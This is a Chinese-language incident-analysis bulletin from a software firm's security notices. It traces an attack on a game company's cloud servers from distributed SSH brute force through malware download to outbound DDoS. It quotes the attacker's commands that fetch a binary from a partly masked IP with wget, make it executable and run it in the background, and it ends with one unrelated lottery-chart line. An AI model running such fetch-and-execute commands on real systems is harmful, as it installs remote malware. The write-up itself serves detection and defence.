收藏 [登錄/注冊] 歡迎
榕基門戶網及子站
聯系我們
  • 福建榕基軟件股份有限公司
  • 電話:0591-87860988
  • 傳真:0591-87869595
  • 地址:福建省福州市鼓樓區
  •    軟件大道89號
  •    A區15座
  • 郵編:350003
您的當前位置:首頁 > 技術支持 > 安全公告

態勢感知之攻擊鏈分析

0x00、前言

在公有云部署游戲業務是目前App游戲上線的主要運營模式,因為App游戲運營圖的就是快,有價值的App上線一周就能看出未來盈利趨勢。競爭對手就會緊盯對方安全問題,最簡單最直接的就是DDoS攻擊,但是伴隨著黑客團隊的技術水平的提高,通過入侵的方式干掉競爭對手也是一個不錯的選擇。

但是我們反觀一下云租戶的現狀:

手游廠商也不太重視安全投入,以為使用免費的安全解決方案就能解決問題,收費的產品就買一個高防IP就完事,等到出事的時候就后悔莫及。決策者安全意識不強。

其次100臺vm(4core/16G/4m)+10個RDS(2core/8G/500G)一個月費用:7萬多,10%投入:7000,買100點態勢感知應該夠,租戶對云安全方面的投入驗證不足,發現入侵沒一個順手的工具,效率上不去。

沒有一個好的安全運營人員,配合安全產品運營做好游戲運營,但是據我了解,絕大部分游戲公司都是拿通用運維當安全運營用。

0x01、入侵調查

下面以一個真實的案例,和大家聊聊,如何串聯攻擊鏈。

stage one:分布式暴力破解

一般入侵流程都分5個階段:

·偵察 – 主動收集數據

· 漏洞掃描 – 使用收集的數據檢查網絡是否存在漏洞

· 獲得訪問權限

· 維持訪問權限

· 搞破壞

借助網絡入侵檢測(NIDS)事件,您通常能夠在攻擊者獲得訪問權限之前檢測到大多數“主動”偵察和漏洞掃描并進行處理。

掃描類型

· 偵察是指入侵者與目標系統合作以收集有關開放端口,開放服務,應用程序,操作系統,LAN / WAN設備模型的信息。攻擊者使用的一些常見“主動”工具是Nmap,Hping3,FOCA,Recon-ng,zMap等。

· 漏洞掃描是一種安全技術,用于通過在資產上引入網絡漏洞測試來識別計算機系統中的安全漏洞。出于安全考慮,個人或網絡管理員可以使用漏洞掃描。試圖未經授權訪問計算機系統的黑客也可以使用它。

哪些事件可以檢測掃描?出現在以下某個類別上的事件:

· 掃描規則:這些規則檢測“主動”偵察和使用某些漏洞掃描工具。您可以在參考事件的規則:https://rules.emergingthreats.net/open/suricata-4.0/rules/emerging-scan.rules

· 漏洞攻擊規則:檢測直接攻擊的規則。您可以在參考事件的規則:https://rules.emergingthreats.net/open/suricata-4.0/rules/emerging-exploit.rules

在此次安全事件中,觸發了暴力破解規則:ET SCAN LibSSH Based Frequent SSH Connections Likely BruteForce Attack,

另外,在主機層面,我們上傳了用戶的登陸流水(/var/log/secure),進入elk中,通過ssh登陸日志格式解析,提取出每個訪問IP的登陸成功和失敗的頻率,從中我們發現有多個IP組成了分布式暴力破解集群對云主機進行攻擊,根據爆破的次數來看每個IP也就執行了2000多次,而且主機SSH密碼相當復雜同時也超過了12位,很明顯是針對該用戶產生的獨立的密碼庫,也許還使用了以前暴露的社工庫。

stage Two:登陸服務器下載惡意軟件并且執行

這個步驟就比較簡單,登陸到服務器執行下載命令,賦權,本地執行。

wgethttp://201.22.x.56/sslog

chmod 0755 /usr/bin/sslog

nohup /usr/bin/sslog > /dev/null 2>&1 &

我們通過命令行審計自動化手段,上傳日志分析,有以上連續執行動作,告警。

stage Three:運行惡意軟件,對外DDoS。

sslog軟件又啟動了另外一個進程對外DDoS攻擊。用戶反饋,游戲掉線和卡頓,給用戶造成經濟損失,升級帶寬無效。

最終的攻擊鏈如下:

態勢感知之攻擊鏈分析

0x02、總結

對于用戶來說,態勢感知能給用戶帶來的價值就是,通過自動化運營的手段提升管理效率。也希望在公有云租戶在安全方面投入更多,因為App游戲按照正常來講,是可以賺錢的。防止競爭對手針對性攻擊是非常必要的。

福彩3d跨度走势图300期带连线